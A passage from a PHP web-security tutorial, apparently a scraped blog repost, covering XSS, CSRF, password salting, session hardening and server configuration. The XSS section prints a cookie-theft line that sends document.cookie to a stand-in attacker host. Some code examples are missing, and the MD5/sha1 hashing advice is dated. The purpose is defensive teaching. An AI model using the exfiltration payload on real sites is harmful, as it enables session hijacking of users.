The script tag will be echoed in the body and the code in it would be executed. Ofcourse its a clientside problem and the code is executed in the user's browser, but still this kind of vulnerability has all the potential a hacker would look for.

Recent versions of Google Chrome would block it saying "Refused to execute a JavaScript script. Source code of script found within request." Firefox still executes it.

XSS is mostly used to inject javascript code to steal cookies of legitimate users who are logged in. The hacker can first inject a complete script like this

Now the xss.js can have the following piece of code to take away value of the document.cookie variable and send it to hacker_website.com

document.location = 'http://www.hacker_website.com/steal.php?cookies=' + encodeURI(document.cookie);

This is just a basic idea of how it works. Check the  for a list of different techniques that can be used.

Fix XSS

Whenever echoing user input of any kind, use  to convert all html characters to corresponding html entities.

...Search results for :
...

Now whatever will be echoed from $term would not have any html code.

Other functions like strip_tags and htmlspecialchars can also be used to clean the input data.

session.cookie_httponly

This php.ini setting specifies the 'HttpOnly' flag in the Set-Cookie field of the http headears. By specifying the HttpOnly flag, we instruct the browser to not expose the cookie to client side scripting language like javascript and use it only for the http communication.

session.cookie_httponly = 1

As of now, all modern browsers support this option and hence it is a quick way to protect the cookies. It would make harder for an attacker to steal the cookie and hijack the session.

5. Always name your file as only .php

Although this is a not very significant to mention point, but still there have been instances of this particular security flaw.

Ensure that all php code files have the extension ".php"

Lets say the database credentials are stored in a separate configuration file and that the file has been named as 'config.inc'.

Now if this file is opened in the browser, the contents will be displayed right away.

Hence never name your files to anything else except .php

6. Salt the passwords and use stronger encryption like bcrypt

Md5 is a very popular encryption algorithm/function being used by php developers. The md5 function gives the hash rightaway.

$hash = md5($password);

However md5 is not a fully secure way to store passwords. Most users tend to keep a 5-8 character password, and whatever be the complexity of such a password, it can be easily cracked by just bruteforcing on a normal computer/pc.

Moreover even bruteforcing might not be necessary, just typing the hash on google.com would reveal the password on some password cracking/rainbow table website. Although users are repeatedly told to keep a strong password its not enough.

To overcome this problem developers often use "salt". The add some more text to the password before hashing it and then do the same when comparing user provided password.

$salt = 'SUPER_SALTY';$hash = md5($password . $salt);

Adding a salt increases the length of the password, and hence its complexity. So the time required for a brute force program to crack it increase by a huge span.

Along with salt, its a good practice to use a longer(slower) hash algorithm like sha1, sha2 etc. The slower the hashing algorithm, more the time required by a brute force program and hence better the strength.

Bcrypt encryption is even more complex than the sha algorithm and considered more secure. Check the php  function.

7. Protect against CSRF

CSRF stands for Cross Site Request Forgery. In this attack a hacker makes a legitimate user do an action on the target web application, without the user being aware at all that he is doing something on the target website.

Lets say a certain url in the application performs some database changes

update_info.php?id=123delete_record.php?id=123

The problem with the above url is that, what if a hacker makes a legitimate user call such a url without the user actually noticing it.

A hacker can setup a webpage with the following piece of code

And now ask the user to open this webpage. Now since the user is logged into the application the url will be triggered and whatever action necessary would be taken by the script.

So basically a hacker has made the request through the user. This is "request forgery".

So technically speaking the problem here is that the server is not able to identify if the user willingly called the url or not. Hence there needs to be a mechanism for this.

A simple way to verify this is by asking the user for double confirmation when doing important tasks.

A more robust and generic solution is to enable the server to identify each request with a key/random value. Forms can contain a hidden input field with a random value that was generated and saved in the session to identify this form submission.

Now if a hacker tries to forge a request he would run out of the csrf key/token and his attempt to perform the request on behalf of the actual user would fail. Only if the user actually loads a url/page with his own wish, would it contain the csrf protection key and then if the user makes the request, would the task be really executed.

Securing the Session

8. Regenerate Session ID

It is a good idea to regenerate the session id at specific events or intervals. It might help if the earlier session id was hacked.

To regenerate the session id use the following function

session_regenerate_id(); //changes only session id//orsession_regenerate_id(true);

The session id should be regenerated atleast when authentication levels change, for example when

  • a user logs in
  • a user logs out
  • a user gets administrative access or change of privilege happens.
if(valid_username() and valid_password()){    $_SESSION['logged'] = true;    $_SESSION['username'] = $username;}

You may even want to regenerate session id every 15 minutes or every 100 requests ?

session_start();//increment and checkif ( ++$_SESSION['regenerated_count'] > 100 ) {    //reset and regenerate    $_SESSION['regenerated_count'] = 0;    session_regenerate_id(true);}

9. Lock the user agent during a session

This can help prevent session hijacking. It is simply about checking if the user agent of a user changed or not. If it did , then logout the user and ask to login again. First save the user agent signature when the user logs in. Then on every request compare the current user agent with the old user agent.

//Function to check if user is logged in or notfunction check_login_status(){    if($_SESSION['logged'] == true and $_SESSION['old_user_agent'] == $_SERVER['HTTP_USER_AGENT'])    {        return true;    }        return false;}if(!check_login_status()){    logout();}//Rest of the login protected page

A better comparison string would be a hash of various user agent details.

$user_agent = md5( $_SERVER['HTTP_ACCEPT_CHARSET'] . $_SERVER['HTTP_ACCEPT_ENCODING'] . $_SERVER['HTTP_ACCEPT_LANGUAGE'] . $_SERVER['HTTP_USER_AGENT']);

If the value of this hash ever changes, logout the user and make him login again. This is a practical approach and should be implemented as a standard practise in any web application.

Lock the IP of a session

If even stronger security is required, then the user's ip address can be locked as well during a session. Just add it to the user_agent hash so that it gets used in the comparison.

$user_agent = @md5( $_SERVER['HTTP_ACCEPT_CHARSET'] . $_SERVER['HTTP_ACCEPT_ENCODING'] . $_SERVER['HTTP_ACCEPT_LANGUAGE'] . $_SERVER['HTTP_USER_AGENT'] . $_SERVER['REMOTE_ADDR']); 

10. Store sessions in database

By default sessions are stored in files. Many applications are hosted on shared hosting environments where the session files are saved to /tmp directory. Now this directory may be readable to other users. If unencrypted the session information will be plain text in the file :

userName|s:5:"ngood";accountNumber|s:9:"123456789";

There are many workarounds for this. Encrypt the session information with suhosin. Check out the .

Store sessions in database. Sessions stored inside database are not visible like files. They are only available to the application using it.

11. Force single session

If needed , make sure that a user is not logged in from 2 locations at a time. If another login takes place , then logout the previous login. This is useful on websites that exchange confidential data , for example an online shopping website.

This is easy to implemented when sessions are saved in database. Simply delete any previous login record of a username on every login.

The Setup

12. Configure the database user with care

Make sure the database user does not have privileges to execute command or write to local filesystem. If there is an sql injection vulnerability somewhere in the website and the database user has write privileges, then this is sufficient for a hacker to take over the server completely just by using simple tool like sqlmap.

So the permissions of the database user should be set according to needs. It is a good idea to have a separate user for use by the web application that has only the minimal required privileges on the database system. Or have separate database users for viewing and modifying the database.

13. Disable directory content listing

Using htaccess

Putting the following the .htaccess file shall disable directory listing.

Options -Indexes

Using index.html

If the server does not allow this, then the easiest way is to put a dummy index.html file in all directories.

So that when directory path is accessed, the index.html will open up.

14. Keep resources outside WEB_ROOT

When hosting applications on a server , the path is generally like this :

/var/www/
OR
/home/username/www/

All web content is kept inside www , then only it is accessible on a website. But those contents which are not meant to be directly accessible from a url , can be kept outside the /www.

For example uploaded images , or resource files , or files containing database connection parameters or anything.

php files to be called by browser in
/var/www/

Other resource files in

/var/outside/

By doing this the files automatically become invisible to outside world even if directory listing is enabled.

Upload files to a location outside webroot

Applications that allow users to upload files can put the uploaded files in a location that is outside the web root. This can help in a situation of arbitrary file upload. If a hacker were to find such a vulnerability he would try to upload a shell script and execute it by triggering from the browser. Now if the file is outside the web root, then even if the hacker would know the path to the file, it would be harder for him to execute the shell.

15. Disable display_errors in your php.ini file

Do not wait to turn off display_errors in your php script using ini_set or htaccess or anything similar.

Compilation errors that occur before execution of the script starts will not obey any script rules and would be displayed right away. Hence display of errors should be disabled right in the php.ini file in production environment.

16. Setup correct directory permissions in the production environment

Directories should have proper permissions with regard to the need of being writable or not. Keep a separate directory for temp files, cache files and other resource files and mark them writable as needed. Everything else like the directory containing core application code, library files etc should be unwritable.

Also directories (like temp) which can contain resource files, or files with other information should be guarded well and be totally inaccessible to the outside web. Use htaccess to block all access to such directories

deny from all

Call
Send SMS
Add to Skype
You'll need Skype Credit Free via Skype

转载于:https://my.oschina.net/cart/blog/169582

你可能感兴趣的文章
BigDecimal 舍入模式(Rounding mode)介绍
查看>>
开源 免费 java CMS - FreeCMS1.2-标签 infoSign
查看>>
开源 免费 java CMS - FreeCMS1.9 移动APP生成栏目列表数据
查看>>
git reset 三种用法总结
查看>>
hdfs笔记
查看>>
虚拟机新增加硬盘,不用重启读到新加的硬盘
查看>>
Java IO流详尽解析
查看>>
邮件服务系列之四基于虚拟用户的虚拟域的邮件系统(安装courier-authlib以及部分配置方法)...
查看>>
Linux VSFTP服务器
查看>>
《中国梦之声》新季开播 乐视生态“逆向造星”
查看>>
DHCP中继数据包互联网周游记
查看>>
Squid 反向代理服务器配置
查看>>
情深意伤
查看>>
Java I/O操作
查看>>
Tomcat性能调优
查看>>
项目管理心得
查看>>
Android自学--一篇文章基本掌握所有的常用View组件
查看>>
灰度图像和彩色图像
查看>>
通过vb.net 和NPOI实现对excel的读操作
查看>>
TCP segmentation offload
查看>>